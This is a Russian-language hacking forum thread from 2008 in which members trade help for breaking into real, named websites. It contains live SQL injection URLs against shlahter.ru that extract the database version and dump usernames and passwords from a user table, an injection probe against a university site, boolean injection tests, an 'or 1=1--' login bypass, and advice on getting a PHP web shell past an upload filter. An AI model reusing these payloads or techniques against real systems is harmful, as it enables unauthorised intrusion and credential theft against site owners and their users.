Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    http://shlahter.ru/index.php?showfile=1&fid=7&p=downloads&area=1&categ=-1+union+select+1,version(),3/*
    таблица koobi4_user или kpro_user не получ все таки
     
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    bag тебе сюда
    _https://forum.antichat.ru/thread56409-sweb.html
     
  3. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    sweb фильтрует все млин:(
     
  4. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    как отправить пост вместо гет?
     
  5. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    воспользуйся http://gibs0n.name/tools/madpost.php

    почитай мой пост на той странице.
     
  6. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    спасибо, запрос выполняется, но данные не выводяться почему то:(
     
  7. bag

    bag Elder - Старейшина

    Joined:
    6 Mar 2008
    Messages:
    116
    Likes Received:
    48
    Reputations:
    0
    http://shlahter.ru/index.php?showfile=1&fid=7&p=downloads&area=1&categ=-1+union+select+1,concat_ws(pass,uname),3+from+kpro_user/*
    дальше никак :(
     
  8. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    У меня имеется сайт-файлообменник, при реге у тебя создаются на сайте папка site.com/upload/user/ в которую можно заливать все что угодно, например ссылка на залитый файл будет выглядеть site.com/upload/user/file.x. Я пытался залить файл shell.php, но при попытке пройти по ссылке upload/user/shell.php сервер предлагает его скачать как shell_php.htm т.е. он его переименовывает хотя ссылка на файл остается upload/user/shell.php и содеожимое файла "500 Internal Server Error", а если имя неверно, то выкидывает ошибку 404. Файловый архив самописный. Вопрос: Можно ли как-нибудь залить шелл?
     
    #1248 QZAR-X, 18 Mar 2008
    Last edited: 18 Mar 2008
  9. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    prozorov, если хочешь - могу попробовать помочь - постучись мне в асю. В профиль загляни, она там в подписи.
     
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    QZAR-X, проверь на счет фильтрации. Попробуй залить html файл и посмотри добавит ли он html, попробуй phtml, txt ну разные вообщем и напиши результаты.
     
  11. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    html отфильтровал в file_html.txt
    phtml так и оставил (file.phtml), но все равно предлагает его скачать.
     
  12. QZAR-X

    QZAR-X New Member

    Joined:
    14 Feb 2008
    Messages:
    13
    Likes Received:
    2
    Reputations:
    0
    мне кажется что скрипт испольщует ЧПУ, потому что залиышийся файл имеет ссылку site/download/mydir/file.x, а если нажать из меню на ссылку дириктории в которой лежит файл, то она будет уже site/dir/mydir/. И еще если к адресу приписывать site/dir/mydir/4343/4535/343/ (директории с цифрами не существуют), то сайт откроет(скорее всего делает вид что открыл) все эти папки но они будут пустыми.
     
  13. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Ну..значит грамотно настроено все. По-крайней мере я не вижу обходных путей вот так вот "удаленно" )
     
  14. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    сиквил инъекция, встречаюсь не первый раз, но ничего не могу сделать, в помощь ипользовал ваши статьи. Может кто подскажет, что я делаю не правильно? Буду блпгодарен.
    пример: http://www.ksu.ru/usvr/index.php?id=17&idm=-1'
     
  15. Don1=2

    Don1=2 Member

    Joined:
    10 Sep 2007
    Messages:
    0
    Likes Received:
    51
    Reputations:
    -19
    "что я делаю не правильно", ну ты как я вижу поставил кавычку... что ты ещё делал? я не понимаю тебя ;)
     
  16. Fuckel

    Fuckel Banned

    Joined:
    16 Jan 2008
    Messages:
    274
    Likes Received:
    59
    Reputations:
    6
    почему на запрос group order и тд выдает тоже самое?
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Fuckel
    Наличие ошибки не всегда свидетельствует о наличии уязвимости, нужно проверять на возможность иньекции например так:
    +and+1=1/*
    +and+1=2/*
    А вообще, именно этот ресурс уже задолбали, поищи на форуме и увидешь где и как иньекция проходит если интересно
     
  18. none222

    none222 Guest

    Reputations:
    0
    ды нет, просто нужно всегда проверять на наличие открытых скобок вот так:
    нет ошибки, значит как минимум 1 скобка открыта. теперь так:
    ЭРРОР, значит 1 скобка открыта и её нужно закрыть.

    А птоом подбираем:
    потом по стандарту:
    и видим:
     
    1 person likes this.
  19. LordsTN

    LordsTN New Member

    Joined:
    19 Jan 2007
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Вот у меня такой вопрос:
    есть некая страница в каталоге /agents/
    которая требует обязательно ввести логин и пасс,
    если не ошибаюсь по моим наблюдениям логин не фильтруется, но я незнаю ни одного логина, приблизительный запрос: select xxx from xx_table where login=$login and pass=$pass, логины типичные admin, administrator и т.п. не прокатывает,
    вопрос: что можно в этих случаях сделать?
     
  20. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    login=31337 or 1=1--
    pass=qwerty

    ?

    пробуй так, с кавычками, скобками тд.
     
Thread Status:
Not open for further replies.